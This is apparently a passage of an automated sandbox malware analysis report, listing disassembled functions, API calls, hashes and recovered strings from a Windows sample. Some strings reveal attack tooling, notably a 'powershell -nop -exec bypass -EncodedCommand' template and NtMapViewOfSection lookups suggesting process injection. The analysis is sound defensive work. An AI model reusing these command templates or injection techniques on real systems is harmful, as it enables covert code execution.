                    • Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                    • Instruction ID: a40d540d47b088048bfe16391e653f490ec8f920807c678a62003acf545fab94
                    • Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                    • Instruction Fuzzy Hash: BA112B6131478286FBD1BF22A90131EA7A7BF45BC0F448B25AE8997B15EF3CC4518B15
                    Function 001BFA20 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                    • String ID:
                    • API String ID: 1547050394-0
                    • Opcode ID: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                    • Instruction ID: d79c40bf3918c9fa484927681f85c025c9643a4f9237e60832a0d1a35a135649
                    • Opcode Fuzzy Hash: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                    • Instruction Fuzzy Hash: 90112B3130478691DB155F72AC0179EA691BBA9BC4F48443DFE8997B15EF3CC4528700
                    Function 001C9B3C Relevance: 9.1, APIs: 6, Instructions: 63COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
                    • String ID:
                    • API String ID: 2102446242-0
                    • Opcode ID: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                    • Instruction ID: dd29af7a0bbcfb0f8c885d72607cb4f9eedecfcd2488692b8e97fb2a43453b91
                    • Opcode Fuzzy Hash: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                    • Instruction Fuzzy Hash: 9C11E632300681A5DB056FA9E8D9FBD7654ABB1760F59412DEA160B392CB78CC41C314
                    Function 0066FC64 Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 0066FC85
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • free.LIBCMT ref: 0066FCC0
                    • fwrite.LIBCMT ref: 0066FD01
                    • fclose.LIBCMT ref: 0066FD09
                    • free.LIBCMT ref: 0066FD16
                      • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                      • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                      • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                    • GetLastError.KERNEL32 ref: 0066FD1B
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                    • String ID:
                    • API String ID: 1616846154-0
                    • Opcode ID: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                    • Instruction ID: 7beae5d72eb1f2fed228a9ffe6e69fda94c884abe9a2695e6ca6c291c5bb6aa4
                    • Opcode Fuzzy Hash: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                    • Instruction Fuzzy Hash: A011C851304B4041DA50F762F05126E5353AB85FE4F448639FF6D47B8AEE3DC6058784
                    Function 00674488 Relevance: 9.1, APIs: 6, Instructions: 51pipefileCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                    • String ID:
                    • API String ID: 3798860377-0
                    • Opcode ID: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                    • Instruction ID: a5eaa13596bb6ba13a5b20f1861f8e719e20c87dd55486891cc02f8470e61110
                    • Opcode Fuzzy Hash: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                    • Instruction Fuzzy Hash: F411C13270465183FB109B25F52872A63A6F784BA8F408215DB5E47F98CF7DC4668B41
                    Function 0067EFEC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 0067F00F
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • malloc.LIBCMT ref: 0067F01D
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                    • malloc.LIBCMT ref: 0067F03F
                    • _snprintf.LIBCMT ref: 0067F05A
                      • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                      • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                    • malloc.LIBCMT ref: 0067F075
                    Strings
                    • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 0067F044
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                    • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                    • API String ID: 3518644649-2739389480
                    • Opcode ID: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                    • Instruction ID: e4aaa5cf7ec710a51765eb7b204984538c75f910b742846cdf55e64eaa3db872
                    • Opcode Fuzzy Hash: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                    • Instruction Fuzzy Hash: 8B01D231705B9046DA84DB92B804B19769AF78CFE0F04822DEFAD47BC6DF38C1418780
                    Function 001BE3EC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 001BE40F
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • malloc.LIBCMT ref: 001BE41D
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                    • malloc.LIBCMT ref: 001BE43F
                    • _snprintf.LIBCMT ref: 001BE45A
                      • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                      • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                    • malloc.LIBCMT ref: 001BE475
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                    • String ID: dpoolWait
                    • API String ID: 2026495703-1875951006
                    • Opcode ID: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                    • Instruction ID: 6bb0191720dd6e5e514b52e385db50caed7c4f5a737b4c4f143b590beaf4cb2e
                    • Opcode Fuzzy Hash: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                    • Instruction Fuzzy Hash: 0301DEB1700B9081DA04DB52B844799B7D9F7B8FE0F05822AEFA947BC5CF78C0418780
                    Function 006731F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: freemallocstrchr$rand
                    • String ID:
                    • API String ID: 1305919620-0
                    • Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                    • Instruction ID: b37816b41801c4281175eb57c47ed9b6b93ee4c20e9b0afe91c745b2bdfa0cfe
                    • Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                    • Instruction Fuzzy Hash: 5B613A62208FD481EA269F39A4013EAA392EF95BD4F088129DF8D17715EF3DC243D304
                    Function 001B25F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: freemallocstrchr$rand
                    • String ID:
                    • API String ID: 1305919620-0
                    • Opcode ID: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                    • Instruction ID: 4621b4367b0e2598b79348c7eaca8d736ce7e3cd8140e4c037f313f146006020
                    • Opcode Fuzzy Hash: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                    • Instruction Fuzzy Hash: 2961F862608FC481EA269F29A4113EAB7A0EFA5BD4F085215DF8917B65EF3DC14BC700
                    Function 00664170 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 006641BD
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • malloc.LIBCMT ref: 006641C8
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                    • free.LIBCMT ref: 006642AF
                    • free.LIBCMT ref: 006642B7
                    • free.LIBCMT ref: 006642BF
                    • free.LIBCMT ref: 006642CB
                    • free.LIBCMT ref: 006642D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$_callnewhmalloc$AllocHeap
                    • String ID:
                    • API String ID: 996410232-0
                    • Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                    • Instruction ID: 2d4a88687e5d7507016a98631cb0bebce9c8d6f38e5837d614730d00a0240c0c
                    • Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                    • Instruction Fuzzy Hash: 074134323047828BDB59DBA699607AB275AFB49BC0F604124EF1A47B05DF38DA62C704
                    Function 001A3570 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 001A35BD
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • malloc.LIBCMT ref: 001A35C8
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                    • free.LIBCMT ref: 001A36AF
                    • free.LIBCMT ref: 001A36B7
                    • free.LIBCMT ref: 001A36BF
                    • free.LIBCMT ref: 001A36CB
                    • free.LIBCMT ref: 001A36D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$_callnewhmalloc
                    • String ID:
                    • API String ID: 2761444284-0
                    • Opcode ID: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                    • Instruction ID: abc562699c1c0602eaef7a062d5cb2216df987cc85915ee2cd16499f8642370d
                    • Opcode Fuzzy Hash: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                    • Instruction Fuzzy Hash: E941F326300791ABDB15DF27A9603AE6761FB6ABC0F444024EF6A47701EF38DA67C700
                    Function 0066F274 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: htonl$freemalloc
                    • String ID: zyxwvutsrqponmlk
                    • API String ID: 1249573706-3884694604
                    • Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                    • Instruction ID: 71bde60fd73a793298d6e4adf1f89da9c9d25217c6deb7eab5dc2c0ca77e50fb
                    • Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                    • Instruction Fuzzy Hash: CC21373230078046DB94EBB6E56132D6AD3AB89BD0F04803CEE5E87B5BEE3CC5468344
                    Function 00673FA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32 ref: 00673FE7
                    • GetProcAddress.KERNEL32 ref: 00673FF7
                    • GetLastError.KERNEL32 ref: 006740BF
                      • Part of subcall function 0067CC00: GetCurrentProcess.KERNEL32 ref: 0067CC8D
                      • Part of subcall function 0067D134: GetCurrentProcess.KERNEL32 ref: 0067D161
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                    • String ID: NtMapViewOfSection$ntdll.dll
                    • API String ID: 1006775078-3170647572
                    • Opcode ID: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                    • Instruction ID: 40f3ebebb26c67e1b7042a69d92add0a9986f91f53ff5cdcb4679804f439bff7
                    • Opcode Fuzzy Hash: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                    • Instruction Fuzzy Hash: 3B31EF32710B4482EB10DB22E45976A73A2F788BB4F048329EF6D07B95DF3DC4468B44
                    Function 004025E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: signal
                    • String ID: CCG
                    • API String ID: 1946981877-1584390748
                    • Opcode ID: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
                    • Instruction ID: 293b1a304c256a7ee66eff26b1d91746a270e19344e3818b9830088d28418f87
                    • Opcode Fuzzy Hash: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
                    • Instruction Fuzzy Hash: 1421A171B0154146EE396279865D33B10019B9A374F284E379A3DA73E0DAFECCC2830E
                    Function 001BB630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: strtok$_getptd_time64malloc
                    • String ID: eThreadpoolTimer
                    • API String ID: 1522986614-2707337283
                    • Opcode ID: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                    • Instruction ID: 6b6eb52b04a315c801423870f2c32a99ef6710bb137d619f24a896f26e01ed9d
                    • Opcode Fuzzy Hash: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                    • Instruction Fuzzy Hash: F921D6B2A14BD485DB10DF52E0886AD77A8F7A8FE4B16426AEF5A83B41CF74C441C780
                    Function 00671FB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 00671FD2
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • _snprintf.LIBCMT ref: 00671FF1
                      • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                      • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                    • remove.LIBCMT ref: 00671FFD
                    • remove.LIBCMT ref: 00672004
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                    • String ID: %s\%s
                    • API String ID: 1896346573-4073750446
                    • Opcode ID: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                    • Instruction ID: e0e2b8aff05c8fda56302a13f39a6380ebc104d91b613d64687b117b274513b1
                    • Opcode Fuzzy Hash: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                    • Instruction Fuzzy Hash: 10F0E925208740C6D350AB51B81036AB366E784FC0F588134BF8C5BB16CE38C5528748
                    Function 001B13B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 001B13D2
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • _snprintf.LIBCMT ref: 001B13F1
                      • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                      • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                    • remove.LIBCMT ref: 001B13FD
                    • remove.LIBCMT ref: 001B1404
                    Strings
                    • uld not open process: %d (%u), xrefs: 001B13D7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$remove$_callnewh_invalid_parameter_noinfo_snprintfmalloc
                    • String ID: uld not open process: %d (%u)
                    • API String ID: 2566950902-823969559
                    • Opcode ID: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                    • Instruction ID: a95d3efaa90c2af15f19040f1059ad5b508e251585c17898fc7696caa37f8ee5
                    • Opcode Fuzzy Hash: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                    • Instruction Fuzzy Hash: 6DF08261604B90D9D604AB12B8113EAB364E7A8FD0F9D4535FF8917B1ADF3CC5518744
                    Function 001ADA8C Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _snprintf.LIBCMT ref: 001ADB25
                      • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                      • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                      • Part of subcall function 001B6F38: _snprintf.LIBCMT ref: 001B70A5
                    • _snprintf.LIBCMT ref: 001ADBBD
                      • Part of subcall function 001B2170: strchr.LIBCMT ref: 001B21D6
                      • Part of subcall function 001B2170: _snprintf.LIBCMT ref: 001B220C
                      • Part of subcall function 001B200C: strchr.LIBCMT ref: 001B2069
                      • Part of subcall function 001B200C: _snprintf.LIBCMT ref: 001B20B3
                    • _snprintf.LIBCMT ref: 001ADBD4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
                    • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                    • API String ID: 199363273-1250630670
                    • Opcode ID: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                    • Instruction ID: 8d1d6e67d711b555cd00468b91f0abeea9f9fc8cd94810074212e067c41a4b5e
                    • Opcode Fuzzy Hash: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                    • Instruction Fuzzy Hash: AD61BD36700B8596EB10DF62E8907EEB3A5F799B98F804126EE8E57B58DF78C505C700
                    Function 006700F8 Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                    • Instruction ID: f2c5bbf88da8a699e662fc6f765ffd5b0472a53531a90afa3896da39091dbb55
                    • Opcode Fuzzy Hash: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                    • Instruction Fuzzy Hash: 1651E063B04A40D6EF40EB75D4412ED6362FB95B88F80D129EE0E2771AEF38D64AC744
                    Function 0068062C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1640621425-0
                    • Opcode ID: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                    • Instruction ID: 5dfa00621e6b32b7e7e6c45174b9e572d81259c5b26a8d18c8109948671366af
                    • Opcode Fuzzy Hash: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                    • Instruction Fuzzy Hash: FC314E3230074047FFA8BE63555025EB653BB94FE0F188B249F6647B91E778D49A8744
                    Function 001BFA2C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1640621425-0
                    • Opcode ID: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                    • Instruction ID: 48bfcc009182e69847d8196810102ae09eb5fa0f863c87d3263119f74cd34897
                    • Opcode Fuzzy Hash: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                    • Instruction Fuzzy Hash: 1831062130074486DE2C9E63DE506AAB651F754FE4F18863CDE6A47B91EB78D8878340
                    Function 006654F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 0066553A
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • malloc.LIBCMT ref: 00665545
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                    • free.LIBCMT ref: 0066562C
                    • free.LIBCMT ref: 00665634
                    • free.LIBCMT ref: 00665640
                    • free.LIBCMT ref: 0066564D
                    Memory Dump Source
